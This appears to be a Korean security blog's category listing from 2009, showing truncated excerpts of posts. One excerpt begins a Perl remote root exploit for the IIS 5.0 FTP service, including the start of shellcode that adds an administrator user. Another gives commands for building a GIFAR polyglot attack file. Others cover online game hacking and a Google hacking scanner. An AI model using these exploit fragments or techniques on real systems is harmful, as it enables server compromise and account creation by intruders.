hacking7 IIS 5.0 FTPd / Remote r00t exploit 간만에 Remote 공격 스크립트가 나왔다 ^^; iiz5.pl 로 저장하자 #!/usr/bin/perl # IIS 5.0 FTPd / Remote r00t exploit # Win2k SP4 targets # bug found & exploited by Kingcope, kcope2googlemail.com # Affects IIS6 with stack cookie protection # August 2009 - KEEP THIS 0DAY PRIV8 use IO::Socket; $|=1; #metasploit shellcode, adduser "winown:nwoniw" $sc = "\x89\xe2\xda\xde\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49" . "\x49\x.. 2009. 9. 3. 게임 해킹 2009년 2월 10일 화요일 온라인 게임 서비스 공격 출처 : http://sone.tistory.com/28 온라인 게임 서비스 공격 현황&원리 (중국매크로, 계정 해킹 등) * 이 글은 비단 테일즈위버 뿐만이 아닌 , 모든 온라인게임에 해당되는 글임을 미리 밝힙니다. * 2006년 KISA( 한국정보보호진흥원 ) 에서는 온라인 게임 해킹 대응이란 주제로 문서파일을 배포했습니다. 이 문서에는 국내 온라인게임의 시장 현황, 서비스 구동방식 , 공격현황과 , 그에 따른 대응책 등이 서술되어 있습니다. 정독해본결과 , 최근현황과 크게 다르지 않다고 판단되어 , 문서 내용 중 일부인 , 온라인 게임 서비스 공격 현황에 대해서 글을 옮겨봅니다. 이 공격 현황이란 주제는 대부분 온라인게임에서 골칫거리로 문제되고.. 2009. 8. 10. 구글 해킹 Goolag Scanner Version: 1.0.0.42 원래 Goolag Scanner Version: 1.0.0.41 이였는데 치명적인 버그가 있어서 검색이 안 되었습니다. 그래서 제가 다시 약간 수정을 하고 다음 페이지를 추가로 검색할 수 있게 변경 했습니다. 패치 파일 2009. 5. 22. GIFAR 만들기 동영상 기본 준비 자료 example.gif 파일 helloworld.java 파일 1. java 컴파일 하기 javac helloworld 2. jar 파일 만들기 jar -cf helloworld.jar helloworld.class 3. 공격 gif 파일 만들기 cat example.gif helloworld.jar > gifar.gif PS. docx로 jar 파일과 겹치는건 file-roller로 겹치게 함 솔직히 공개하는게 두렵기도 했지만 공개 합니다 ^^; 악용하지마세용!!! GIFAR 공격에 대한 대응 방안 PoC http://securethoughts.com/2009/01/easy-server-side-fix-for-the-gifar-security-issue/ 실제 적용시는 몇 가지 criti.. 2009. 5. 19. 이전 1 2 다음
